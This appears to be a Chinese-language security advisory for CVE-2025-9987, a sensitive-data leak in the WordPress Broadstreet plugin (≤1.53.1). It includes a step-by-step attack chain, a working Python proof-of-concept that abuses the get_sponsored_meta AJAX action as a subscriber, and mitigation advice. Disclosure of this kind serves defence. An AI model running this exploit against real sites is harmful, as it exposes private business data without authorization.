CVE-2025-9987 CVSS 5.3 中危

CVE-2025-9987 WordPress Broadstreet插件信息泄露漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-9987

漏洞类型

敏感信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Broadstreet Plugin

漏洞概述

WordPress Broadstreet插件在1.53.1及以下版本中存在敏感信息泄露漏洞。由于`get_sponsored_meta()` AJAX动作缺乏严格的访问控制，拥有订阅者及以上权限的攻击者可利用该漏洞，非法提取受密码保护及私有业务详情中的敏感数据。

技术细节

该漏洞源于Broadstreet插件在处理`get_sponsored_meta` AJAX请求时未实施充分的权限检查。尽管该动作需要用户登录，但插件未验证调用者是否有权访问受保护的特定业务数据。攻击者通过向`/wp-admin/admin-ajax.php`发送包含`action=get_sponsored_meta`的POST请求，可绕过前端密码保护，直接获取私有商业详情的元数据信息。

攻击链分析

STEP 1

信息收集

识别目标网站是否安装了Broadstreet插件，并确认其版本在1.53.1及以下。

STEP 2

获取低权限账号

注册或获取一个具有订阅者（Subscriber）级别的WordPress账户。

STEP 3

发送恶意请求

使用该账户登录，向`/wp-admin/admin-ajax.php`发送POST请求，参数包含`action=get_sponsored_meta`及目标数据ID。

STEP 4

数据窃取

服务器返回受密码保护或私有的业务详情数据，攻击者成功获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://example.com/wp-admin/admin-ajax.php"
username = "subscriber"  # Low-privilege user
password = "password"

# Create a session to handle cookies
session = requests.Session()

# Step 1: Authenticate as a subscriber
login_url = "http://example.com/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "redirect_to": "",
    "wp-submit": "Log In",
    "testcookie": "1"
}
session.post(login_url, data=login_data)

# Step 2: Exploit the vulnerable AJAX action
# The vulnerability is in the 'get_sponsored_meta' action
payload = {
    "action": "get_sponsored_meta",
    "id": "1"  # Target ID, may vary based on plugin data structure
}

response = session.post(target_url, data=payload)

if response.status_code == 200:
    print("[+] Request sent successfully.")
    print("[+] Response:")
    print(response.text)
else:
    print("[-] Failed to send request.")

影响范围

Broadstreet <= 1.53.1

防御指南

临时缓解措施

如果暂时无法升级插件，强烈建议禁用Broadstreet插件以阻断漏洞利用路径。此外，应检查网站用户列表，删除可疑的订阅者账户，并确保敏感业务详情不依赖该插件的旧版本进行保护。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表